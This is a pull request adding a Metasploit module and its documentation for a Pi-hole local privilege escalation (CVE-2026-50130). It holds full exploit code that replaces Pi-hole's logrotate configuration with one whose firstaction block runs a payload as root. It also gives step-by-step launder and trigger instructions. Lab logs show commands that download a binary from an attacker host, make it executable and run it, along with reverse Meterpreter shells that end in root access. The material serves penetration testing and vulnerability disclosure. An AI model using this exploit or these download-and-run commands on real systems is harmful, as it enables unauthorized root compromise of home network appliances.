### PR TITLE
Pi-Hole LPE (CVE-2026-50130)

### DIFF
--- a/documentation/modules/exploit/linux/local/pihole_logrotate_lpe.md
+++ b/documentation/modules/exploit/linux/local/pihole_logrotate_lpe.md
@@ -1,0 +1,244 @@
+## Vulnerable Application
+
+Pi-hole core 6.0 through 6.4.2 stores its logrotate configuration at
+`/etc/pihole/logrotate`. The `/etc/pihole` directory is owned by the
+unprivileged `pihole` user (FTL needs write access), so a user with code
+execution as `pihole` can replace the file even though it is root-owned
+(the file cannot be opened for writing, but unlinking and recreating it only
+requires write access to the directory).
+
+`pihole-FTL-prestart.sh` runs as root at every FTL start (`ExecStartPre`) and
+does `chown root:root /etc/pihole/logrotate`, laundering the attacker's
+replacement to root ownership while keeping its content. Two root-owned
+consumers then parse the file:
+
+- `/etc/cron.d/pihole`: `00 00 * * * root pihole flush once quiet` runs
+  `/usr/sbin/logrotate --force --state /var/lib/logrotate/pihole
+  /etc/pihole/logrotate`
+- `@reboot root /usr/sbin/logrotate --state /var/lib/logrotate/pihole
+  /etc/pihole/logrotate`
+
+logrotate executes `firstaction`/`lastaction` script blocks from the
+configuration as uid 0. Fixed in core 6.4.3, which moves the file to the
+root-owned directory `/etc/logrotate.d/pihole`.
+
+A session as the `pihole` user is required. In pi-hole v6 the FTL process
+itself runs as `pihole`, so the FTL dnsmasq configuration-injection CVEs
+(CVE-2026-35517 through CVE-2026-35521, and CVE-2026-39849 which is still
+unpatched) land directly in this context on FTL 6.x.
+
+### Docker
+
+The `2026.04.0` image ships core 6.4.1 (vulnerable; the fix is in 6.4.3):
+
+`docker-compose.yml`
+
+```
+services:
+  pihole:
+    container_name: pihole
+    image: pihole/pihole:2026.04.0
+    ports:
+      - "8080:80"
+    environment:
+      TZ: 'UTC'
+      FTLCONF_webserver_api_password: 'pihole1!'
+    cap_add:
+      - NET_ADMIN
+    restart: unless-stopped
+```
+
+Get a `pihole` user shell through the container console to simulate the
+initial access:
+
+```
+docker exec -it -u pihole pihole /bin/sh
+```
+
+Docker notes: the image does not ship `/etc/cron.d/pihole` (crond runs with
+no pi-hole entry), so the daily trigger has to be fired manually with the
+same command the cron entry uses on a real installation. The image also
+reinstalls the stock logrotate file at every container start, so laundering
+is demonstrated by running `/opt/pihole/pihole-FTL-prestart.sh` directly
+(the `ExecStartPre` of a normal FTL restart) instead of restarting the
+container.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get a session as the `pihole` user
+1. Do: `use exploit/linux/local/pihole_logrotate_lpe`
+1. Do: `set session [#]`
+1. Do: `run`
+1. The module replaces `/etc/pihole/logrotate`, tries to launder the
+   ownership through an FTL restart, and the payload executes as root when
+   the daily `pihole flush once` cron fires (00:00 local) or at the next
+   reboot.
+
+## Options
+
+### WRITABLE_DIR
+
+Directory used to stage the payload script and the malicious configuration
+before moving them into place. It must be on an exec-mounted filesystem:
+`/dev/shm` is mounted `noexec` on many systems (including the official
+docker image), so the default is `/tmp`.
+
+## Scenarios
+
+### Pi-hole core 6.4.1, FTL 6.6 (docker 2026.04.0)
+
+#### Initial session (pihole user)
+
+Start the docker image:
+
+```
+$ docker compose down -v && docker compose up -d                                                        
+[+] Running 2/2
+ ✔ Container pihole        Removed                                                                                                                                                              3.3s 
+ ✔ Network pihole_default  Removed                                                                                                                                                              0.4s 
+[+] Running 2/2
+ ✔ Network pihole_default  Created                                                                                                                                                              0.1s 
+ ✔ Container pihole        Started 
+ ```
+
+ Start original listener:
+
+ ```
+$ ./msfconsole -q                                                
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg session -1
+session => -1
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446 
+
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO PnLjgR7D --no-check-certificate http://1.1.1.1:8082/l; chmod +x PnLjgR7D; ./PnLjgR7D& disown
+```
+
+The docker image doesn't have `wget`, just `curl`, so convert it to a `curl` command and run.
+
+```
+$ docker exec -it -u pihole pihole bash                                                                 
+0c10bea93a5c:/$ cd /tmp; curl -sk http://1.1.1.1:8082/l -o PnLjgR7D; chmod +x PnLjgR7D; ./PnLjgR7D& disown
+[1] 429
+```
+
+Double check we're good:
+
+```
+msf exploit(multi/script/web_delivery) > [*] 172.25.0.2       web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3106788 bytes) to 172.25.0.2
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 172.25.0.2:42414) at 2026-09-04 13:10:25 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: pihole
+meterpreter > sysinfo
+Computer     : 0c10bea93a5c
+OS           :  (Linux 7.0.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+#### Priv Esc
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/linux/local/pihole_logrotate_lpe 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/local/pihole_logrotate_lpe) > set FETCH_SRVPORT 8987
+FETCH_SRVPORT => 8987
+msf exploit(linux/local/pihole_logrotate_lpe) > exploit
+[*] Command to execute on target: curl -so ./eGNNDnatL http://1.1.1.1:8987/t70WmtC4mNeBieRpZqn09Q;chmod +x ./eGNNDnatL;./eGNNDnatL&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8987
+[*] HTTP server started
+[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(linux/local/pihole_logrotate_lpe) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pi-hole core 6.4.1 with replaceable /etc/pihole/logrotate
+[*] Writing payload script to /var/tmp/.G9e4IqurZ.sh
+[*] Staging the malicious logrotate configuration
+[*] Replacing /etc/pihole/logrotate
+[+] Wrote malicious configuration (currently owned by pihole)
+[!] The configuration is owned by the unprivileged user until FTL restarts
+[!] pihole-FTL-prestart.sh chowns the file root:root at the next FTL service start
+[!] The exploit needs a launder step (FTL service start) followed by a fire step (root logrotate):
+  # Launder - any FTL service start runs the prestart as root:
+    * sudo systemctl restart pihole-FTL
+    * sudo /opt/pihole/pihole-FTL-prestart.sh (same path on docker and bare metal)
+    * kill -9 $(pidof pihole-FTL) - FTL runs as your user and systemd Restart=on-failure
+      relaunches it through the prestart (SIGKILL; a clean SIGTERM exit is not restarted,
+      and systemd caps restarts at 5/min)
+    * Naturally: reboot, FTL crash/OOM, pihole -up / -r / checkout
+  # Fire - root logrotate parses the config and runs firstaction:
+    * Wait for the daily root cron 'pihole flush once' at 00:00 local, next run ~ 2026-09-05 00:00:00 -0400
+    * Reboot: the @reboot logrotate entry (races the prestart chown at boot; if it loses,
+      the next midnight flush still fires)
+    * As root: pihole flush once, or /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate
+  # Docker target (no systemd, no /etc/cron.d/pihole in the image; a container restart
+  # reinstalls the stock config via start.sh and destroys the staging):
+    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> pihole flush once
+    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate
+[*] Waiting up to 90000 seconds for the trigger to fire
+```
+
+Manually trigger the launder and fire stages.
+
+```
+docker exec pihole sh /opt/pihole/pihole-FTL-prestart.sh
+docker exec pihole /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate
+```
+
+Check root shell:
+
+```
+[*] Client 172.25.0.2 requested /t70WmtC4mNeBieRpZqn09Q
+[*] Sent payload to 172.25.0.2 (curl/8.17.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3106788 bytes) to 172.25.0.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 172.25.0.2:39620) at 2026-09-04 13:57:31 -0400
+
+msf exploit(linux/local/pihole_logrotate_lpe) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : d7323a9d253b
+OS           :  (Linux 7.0.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

--- a/documentation/modules/exploit/linux/local/pihole_logrotate_lpe.md
+++ b/documentation/modules/exploit/linux/local/pihole_logrotate_lpe.md
@@ -192,26 +192,13 @@ msf exploit(linux/local/pihole_logrotate_lpe) > [*] Running automatic check ("se
 [*] Staging the malicious logrotate configuration
 [*] Replacing /etc/pihole/logrotate
 [+] Wrote malicious configuration (currently owned by pihole)
-[!] The configuration is owned by the unprivileged user until FTL restarts
-[!] pihole-FTL-prestart.sh chowns the file root:root at the next FTL service start
-[!] The exploit needs a launder step (FTL service start) followed by a fire step (root logrotate):
-  # Launder - any FTL service start runs the prestart as root:
-    * sudo systemctl restart pihole-FTL
-    * sudo /opt/pihole/pihole-FTL-prestart.sh (same path on docker and bare metal)
-    * kill -9 $(pidof pihole-FTL) - FTL runs as your user and systemd Restart=on-failure
-      relaunches it through the prestart (SIGKILL; a clean SIGTERM exit is not restarted,
-      and systemd caps restarts at 5/min)
-    * Naturally: reboot, FTL crash/OOM, pihole -up / -r / checkout
-  # Fire - root logrotate parses the config and runs firstaction:
-    * Wait for the daily root cron 'pihole flush once' at 00:00 local, next run ~ 2026-09-05 00:00:00 -0400
-    * Reboot: the @reboot logrotate entry (races the prestart chown at boot; if it loses,
-      the next midnight flush still fires)
-    * As root: pihole flush once, or /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate
-  # Docker target (no systemd, no /etc/cron.d/pihole in the image; a container restart
-  # reinstalls the stock config via start.sh and destroys the staging):
-    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> pihole flush once
-    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate
-[*] Waiting up to 90000 seconds for the trigger to fire
+[!] Docker Target:
+  Do NOT restart the container: start.sh reinstalls the stock logrotate and destroys the staging; an FTL kill just bounces the container the same way
+    * Step 1 as root: docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh
+    * Step 2 as root: docker exec <name> pihole flush once
+      OR
+      docker exec <name> /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate
+[*] Waiting indefinitely for the trigger to fire
 ```
 
 Manually trigger the launder and fire stages.

--- a/modules/exploits/linux/local/pihole_logrotate_lpe.rb
+++ b/modules/exploits/linux/local/pihole_logrotate_lpe.rb
@@ -1,0 +1,291 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Post::Linux::System
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pi-hole logrotate Configuration Local Privilege Escalation',
+        'Description' => %q{
+          Pi-hole core versions 6.0 through 6.4.2 keep the logrotate
+          configuration at /etc/pihole/logrotate. The /etc/pihole directory is
+          owned by the unprivileged `pihole` user, so a user with code
+          execution as `pihole` can replace the file.
+
+          pihole-FTL-prestart.sh runs as root at every FTL start and launders
+          the replacement to root:root ownership. The daily root cron entry
+          (`pihole flush once` -> /usr/sbin/logrotate --force --state
+          /var/lib/logrotate/pihole /etc/pihole/logrotate, and an @reboot
+          logrotate entry) then parses the attacker-authored configuration
+          and executes firstaction/lastaction script blocks as uid 0.
+
+          The payload therefore fires at the next local midnight (or reboot)
+          once an FTL restart has laundered the file ownership. Only real
+          service restarts launder (boot, systemctl restart, update flows,
+          crash recovery under Restart=on-failure); an API/web-triggered
+          resolver restart re-execs FTL in place and does not run the
+          prestart. The module will also opportunistically try to restart
+          the service through passwordless sudo when available.
+
+          This issue is fixed in core 6.4.3, which moves the file to
+          root-owned /etc/logrotate.d/pihole.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'supperhellokitty20' # discovery
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'SessionTypes' => %w[shell meterpreter],
+        # Passive stance: the console auto-backgrounds the run and the module
+        # holds the job open itself (see the wait loop at the end of #exploit).
+        # The ExploitDriver performs no wait_for_session for passive modules,
+        # so without that loop the job would end right after staging and
+        # cleanup would tear the payload handlers down long before the cron
+        # trigger fires.
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Passive' => true,
+        'Payload' => {
+          'BadChars' => "\r\n" # the payload is embedded in a shell script, one line
+        },
+        'Privileged' => true,
+        'References' => [
+          ['CVE', '2026-50130'],
+          ['URL', 'https://github.com/pi-hole/pi-hole/commit/18002bf7c6bf382fe5861d01321f427019e1be89'],
+        ],
+        'DefaultOptions' => {
+          'WfsDelay' => 90_000 # 25hrs, 24 should be enough but dont cut it too short
+        },
+        'DisclosureDate' => '2026-07-06',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        },
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('WRITABLE_DIR',
+                      [true, 'Directory (exec-mounted) used to stage the payload script; /dev/shm is noexec on many systems', '/var/tmp']),
+      ]
+    )
+  end
+
+  LOGROTATE_CONF = '/etc/pihole/logrotate'
+  VERSIONS_FILE = '/etc/pihole/versions'
+
+  # Stock core 6.x logrotate configuration (advanced/Templates/logrotate).
+  # Restored on cleanup; the original cannot usually be read by the pihole
+  # user because it is root:root 0640.
+  def stock_config
+    <<~CONF
+      /var/log/pihole/pihole.log {
+          # su #
+          daily
+          copytruncate
+          rotate 5
+          compress
+          delaycompress
+          notifempty
+          nomail
+      }
+
+      /var/log/pihole/FTL.log {
+          # su #
+          weekly
+          copytruncate
+          rotate 3
+          compress
+          delaycompress
+          notifempty
+          nomail
+      }
+
+      /var/log/pihole/webserver.log {
+          # su #
+          weekly
+          copytruncate
+          rotate 3
+          compress
+          delaycompress
+          notifempty
+          nomail
+      }
+    CONF
+  end
+
+  def pihole_core_version
+    # /etc/pihole/versions is group-readable by pihole and survives CLI breakage
+    if file?(VERSIONS_FILE)
+      begin
+        versions = read_file(VERSIONS_FILE)
+        return Rex::Version.new(Regexp.last_match(1)) if versions =~ /^CORE_VERSION=v?(\d+(?:\.\d+)+)/m
+      rescue StandardError
+        nil
+      end
+    end
+
+    out = cmd_exec('pihole -v 2>/dev/null')
+    return Rex::Version.new(Regexp.last_match(1)) if out =~ /Core version is v?(\d+(?:\.\d+)+)/
+
+    nil
+  end
+
+  def check
+    return CheckCode::Safe('Session is already root') if is_root?
+
+    unless cmd_exec("test -w #{File.dirname(LOGROTATE_CONF)} && echo ok").include?('ok')
+      return CheckCode::Safe("#{File.dirname(LOGROTATE_CONF)} is not writable by the current user")
+    end
+
+    version = pihole_core_version
+    return CheckCode::Unknown('Could not determine the Pi-hole core version') if version.nil?
+
+    unless version.between?(Rex::Version.new('6.0'), Rex::Version.new('6.4.2'))
+      return CheckCode::Safe("Pi-hole core #{version} is outside the vulnerable range (6.0 - 6.4.2)")
+    end
+
+    return CheckCode::Safe("#{LOGROTATE_CONF} not found") unless file?(LOGROTATE_CONF)
+
+    CheckCode::Appears("Pi-hole core #{version} with replaceable #{LOGROTATE_CONF}")
+  end
+
+  def conf_owner
+    cmd_exec("stat -c %U #{LOGROTATE_CONF} 2>/dev/null").strip
+  end
+
+  def exploit
+    @payload_script = ::File.join(datastore['WRITABLE_DIR'], ".#{rand_text_alphanumeric(8..12)}.sh")
+    staged_conf = ::File.join(datastore['WRITABLE_DIR'], ".#{rand_text_alphanumeric(8..12)}.conf")
+
+    # Try to keep a copy of the original for restoration (usually unreadable:
+    # root:root 0640), falling back to the known stock content.
+    if readable?(LOGROTATE_CONF)
+      @original_config = read_file(LOGROTATE_CONF)
+    elsif @original_config.to_s.strip.empty?
+      @original_config = stock_config
+    end
+
+    # A reboot both launders (ExecStartPre) and fires (@reboot logrotate) the
+    # payload, but temp directories are commonly wiped early in boot - tmpfs
+    # mounts or systemd-tmpfiles - before cron runs the @reboot logrotate
+    # entry, taking the staged payload script with them.
+    if %r{\A/(?:tmp|dev/shm|run)(?:/|\z)}.match?(datastore['WRITABLE_DIR'])
+      print_warning("#{datastore['WRITABLE_DIR']} may be cleared at boot (tmpfs or systemd-tmpfiles)")
+      print_warning('A reboot-triggered run can lose the payload script before the @reboot logrotate fires;')
+      print_warning('set WRITABLE_DIR to persistent storage if a reboot is the expected trigger')
+    end
+
+    print_status("Writing payload script to #{@payload_script}")
+    write_file(@payload_script, "#!/bin/sh\n#{payload.encoded}\n")
+    cmd_exec("chmod 755 #{@payload_script}")
+
+    # notifempty is deliberately omitted: logrotate skips firstaction for
+    # stanzas where no log ends up rotated, and empty logs are never rotated.
+    config = <<~CONF
+      /var/log/pihole/pihole.log /var/log/pihole/FTL.log /var/log/pihole/webserver.log {
+          daily
+          copytruncate
+          rotate 3
+          compress
+          delaycompress
+          nomail
+          firstaction
+              #{@payload_script} &
+          endscript
+      }
+    CONF
+
+    print_status('Staging the malicious logrotate configuration')
+
+    # The shipped file is root-owned 0640 and cannot be opened for writing;
+    # unlinking and recreating it only needs write access to /etc/pihole.
+    print_status("Replacing #{LOGROTATE_CONF}")
+    rm_f(LOGROTATE_CONF)
+    write_file(LOGROTATE_CONF, config)
+    rm_f(staged_conf)
+    if file?(LOGROTATE_CONF)
+      print_good("Wrote malicious configuration (currently owned by #{conf_owner})")
+    else
+      fail_with(Failure::UnexpectedReply, "Could not replace #{LOGROTATE_CONF}")
+    end
+
+    if conf_owner == 'root'
+      print_good('Configuration is already root-owned (laundered), waiting on the cron trigger')
+    else
+      print_warning('The configuration is owned by the unprivileged user until FTL restarts')
+      restart = cmd_exec('sudo -n systemctl restart pihole-FTL 2>/dev/null; echo $?')
+      if restart.strip == '0' && conf_owner == 'root'
+        print_good('Restarted pihole-FTL through sudo, ownership laundered to root:root')
+      else
+        now = Time.now
+        next_run = Time.local(now.year, now.month, now.day) + 86_400
+        print_warning('pihole-FTL-prestart.sh chowns the file root:root at the next FTL service start')
+        print_warning('The exploit needs a launder step (FTL service start) followed by a fire step (root logrotate):')
+        print_line('  # Launder - any FTL service start runs the prestart as root:')
+        print_line('    * sudo systemctl restart pihole-FTL')
+        print_line('    * sudo /opt/pihole/pihole-FTL-prestart.sh (same path on docker and bare metal)')
+        print_line('    * kill -9 $(pidof pihole-FTL) - FTL runs as your user and systemd Restart=on-failure')
+        print_line('      relaunches it through the prestart (SIGKILL; a clean SIGTERM exit is not restarted,')
+        print_line('      and systemd caps restarts at 5/min)')
+        print_line('    * Naturally: reboot, FTL crash/OOM, pihole -up / -r / checkout')
+        print_line('  # Fire - root logrotate parses the config and runs firstaction:')
+        print_line("    * Wait for the daily root cron 'pihole flush once' at 00:00 local, next run ~ #{next_run}")
+        print_line('    * Reboot: the @reboot logrotate entry (races the prestart chown at boot; if it loses,')
+        print_line('      the next midnight flush still fires)')
+        print_line('    * As root: pihole flush once, or /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate')
+        print_line('  # Docker target (no systemd, no /etc/cron.d/pihole in the image; a container restart')
+        print_line('  # reinstalls the stock config via start.sh and destroys the staging):')
+        print_line('    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> pihole flush once')
+        print_line('    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate')
+      end
+    end
+
+    # Passive modules receive no wait_for_session from the ExploitDriver, so
+    # hold the job open until the trigger fires (multi/handler pattern).
+    # WfsDelay (default 25h) caps the wait; set WfsDelay 0 to wait forever.
+    stime = Time.now.to_f
+    timeout = datastore['WfsDelay'].to_i
+    print_status("Waiting #{timeout.zero? ? 'indefinitely' : "up to #{timeout} seconds"} for the trigger to fire")
+    loop do
+      break if session_created?
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
+    end
+    unless session_created?
+      print_warning("Giving up after #{timeout}s; the staged configuration stays in place until triggered")
+    end
+  end
+
+  def on_session(session)
+    super
+    return unless session
+
+    cli.core.use('stdapi') unless cli.ext.aliases.include?('stdapi')
+
+    print_status('Cleaning up: restoring the logrotate configuration and removing the payload script')
+    client.fs.file.new(LOGROTATE_CONF, 'wb') do |fd|
+      fd.write(@original_config)
+    end
+    client.fs.file.rm_f(@payload_script)
+    print_status("Restored #{LOGROTATE_CONF}")
+  end
+end

--- a/modules/exploits/linux/local/pihole_logrotate_lpe.rb
+++ b/modules/exploits/linux/local/pihole_logrotate_lpe.rb
@@ -49,12 +49,6 @@ class MetasploitModule < Msf::Exploit::Local
         'Platform' => %w[unix linux],
         'Arch' => [ARCH_CMD],
         'SessionTypes' => %w[shell meterpreter],
-        # Passive stance: the console auto-backgrounds the run and the module
-        # holds the job open itself (see the wait loop at the end of #exploit).
-        # The ExploitDriver performs no wait_for_session for passive modules,
-        # so without that loop the job would end right after staging and
-        # cleanup would tear the payload handlers down long before the cron
-        # trigger fires.
         'Stance' => Msf::Exploit::Stance::Passive,
         'Passive' => true,
         'Payload' => {
@@ -65,9 +59,6 @@ class MetasploitModule < Msf::Exploit::Local
           ['CVE', '2026-50130'],
           ['URL', 'https://github.com/pi-hole/pi-hole/commit/18002bf7c6bf382fe5861d01321f427019e1be89'],
         ],
-        'DefaultOptions' => {
-          'WfsDelay' => 90_000 # 25hrs, 24 should be enough but dont cut it too short
-        },
         'DisclosureDate' => '2026-07-06',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -171,6 +162,53 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec("stat -c %U #{LOGROTATE_CONF} 2>/dev/null").strip
   end
 
+  # The official docker image changes the trigger mechanics: it ships no
+  # /etc/cron.d/pihole, FTL is supervised by start.sh instead of systemd, and
+  # every container start reinstalls the stock logrotate config.
+  def docker_target?
+    return @docker_target unless @docker_target.nil?
+
+    # lxc is deliberately excluded: LXC guests typically run systemd, so the
+    # bare-metal instructions are the correct ones there.
+    probe = '(test -f /.dockerenv || printenv DOCKER_VERSION >/dev/null 2>&1 || ' \
+            'grep -qE "docker|kubepod|containerd" /proc/1/cgroup 2>/dev/null) && echo docker'
+    @docker_target = cmd_exec(probe).include?('docker')
+  end
+
+  def print_launder_hints
+    if docker_target?
+      print_warning('Docker Target:')
+      print_line('  Do NOT restart the container: start.sh reinstalls the stock logrotate and destroys the staging; an FTL kill just bounces the container the same way')
+      print_line('    * Step 1 as root: docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh')
+
+    else
+      print_warning('Non-Docker Target:')
+      print_line('  Step 1: Restart FTL (pick one)')
+      print_line('    * sudo systemctl restart pihole-FTL')
+      print_line('    * sudo /opt/pihole/pihole-FTL-prestart.sh')
+      print_line('    * kill -9 $(pidof pihole-FTL)')
+      print_line('    * reboot')
+      print_line('    * pihole -up / -r / checkout')
+      print_warning('    An API/web resolver restart does NOT launder (FTL re-execs in place, no ExecStartPre)')
+    end
+  end
+
+  def print_fire_hints
+    if docker_target?
+      print_line('    * Step 2 as root: docker exec <name> pihole flush once')
+      print_line('      OR')
+      print_line('      docker exec <name> /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate')
+    else
+      now = Time.now
+      next_run = Time.local(now.year, now.month, now.day) + 86_400
+      print_line('  Step 2: Flush (pick one)')
+      print_line("    * Wait for the daily root cron at 00:00 local, next run ~ #{next_run}")
+      print_line('    * Reboot: the @reboot logrotate entry (races the prestart chown at boot; if it loses, the next midnight flush still fires)')
+      print_line('    * pihole flush once')
+      print_line('    * /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate')
+    end
+  end
+
   def exploit
     @payload_script = ::File.join(datastore['WRITABLE_DIR'], ".#{rand_text_alphanumeric(8..12)}.sh")
     staged_conf = ::File.join(datastore['WRITABLE_DIR'], ".#{rand_text_alphanumeric(8..12)}.conf")
@@ -228,35 +266,16 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if conf_owner == 'root'
-      print_good('Configuration is already root-owned (laundered), waiting on the cron trigger')
+      print_good('Configuration is already root-owned (laundered), waiting on the fire step')
     else
-      print_warning('The configuration is owned by the unprivileged user until FTL restarts')
       restart = cmd_exec('sudo -n systemctl restart pihole-FTL 2>/dev/null; echo $?')
       if restart.strip == '0' && conf_owner == 'root'
         print_good('Restarted pihole-FTL through sudo, ownership laundered to root:root')
       else
-        now = Time.now
-        next_run = Time.local(now.year, now.month, now.day) + 86_400
-        print_warning('pihole-FTL-prestart.sh chowns the file root:root at the next FTL service start')
-        print_warning('The exploit needs a launder step (FTL service start) followed by a fire step (root logrotate):')
-        print_line('  # Launder - any FTL service start runs the prestart as root:')
-        print_line('    * sudo systemctl restart pihole-FTL')
-        print_line('    * sudo /opt/pihole/pihole-FTL-prestart.sh (same path on docker and bare metal)')
-        print_line('    * kill -9 $(pidof pihole-FTL) - FTL runs as your user and systemd Restart=on-failure')
-        print_line('      relaunches it through the prestart (SIGKILL; a clean SIGTERM exit is not restarted,')
-        print_line('      and systemd caps restarts at 5/min)')
-        print_line('    * Naturally: reboot, FTL crash/OOM, pihole -up / -r / checkout')
-        print_line('  # Fire - root logrotate parses the config and runs firstaction:')
-        print_line("    * Wait for the daily root cron 'pihole flush once' at 00:00 local, next run ~ #{next_run}")
-        print_line('    * Reboot: the @reboot logrotate entry (races the prestart chown at boot; if it loses,')
-        print_line('      the next midnight flush still fires)')
-        print_line('    * As root: pihole flush once, or /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate')
-        print_line('  # Docker target (no systemd, no /etc/cron.d/pihole in the image; a container restart')
-        print_line('  # reinstalls the stock config via start.sh and destroys the staging):')
-        print_line('    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> pihole flush once')
-        print_line('    * docker exec <name> sh /opt/pihole/pihole-FTL-prestart.sh && docker exec <name> /usr/sbin/logrotate --force --state /var/lib/logrotate/pihole /etc/pihole/logrotate')
+        print_launder_hints
       end
     end
+    print_fire_hints
 
     # Passive modules receive no wait_for_session from the ExploitDriver, so
     # hold the job open until the trigger fires (multi/handler pattern).
@@ -275,17 +294,43 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def on_session(session)
+  # Runs against the NEW (root) session - not the low-priv SESSION the module
+  # was launched with, so everything goes through the session argument, never
+  # cmd_exec/Post helpers (those target datastore['SESSION']).
+  def on_new_session(session)
     super
     return unless session
 
-    cli.core.use('stdapi') unless cli.ext.aliases.include?('stdapi')
-
     print_status('Cleaning up: restoring the logrotate configuration and removing the payload script')
-    client.fs.file.new(LOGROTATE_CONF, 'wb') do |fd|
-      fd.write(@original_config)
+    begin
+      if session.type == 'meterpreter'
+        session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+
+        # explicit write+close like Msf::Post::File#_write_file_meterpreter -
+        # the block form of fs.file.new never closes the channel, leaving the
+        # file truncated at 0 bytes on the target
+        fd = session.fs.file.new(LOGROTATE_CONF, 'wb')
+        fd.write(@original_config)
+        fd.close
+        session.fs.file.delete(@payload_script)
+      else
+        # Plain CommandShell sessions expose shell_command_token rather than
+        # meterpreter's shell_command; cmd_exec dispatches the same way.
+        b64 = Rex::Text.encode_base64(@original_config)
+        cleanup = "echo '#{b64}' | base64 -d > #{LOGROTATE_CONF}; rm -f #{@payload_script}"
+        if session.respond_to?(:shell_command)
+          session.shell_command(cleanup)
+        elsif session.respond_to?(:shell_command_token)
+          session.shell_command_token(cleanup)
+        else
+          raise 'session supports no shell command API for cleanup'
+        end
+      end
+      print_status("Restored #{LOGROTATE_CONF} and removed #{@payload_script}")
+    rescue StandardError => e
+      elog(e)
+      print_error("Cleanup failed (#{e.class}: #{e.message}); restore #{LOGROTATE_CONF}")
+      print_error("and remove #{@payload_script} manually")
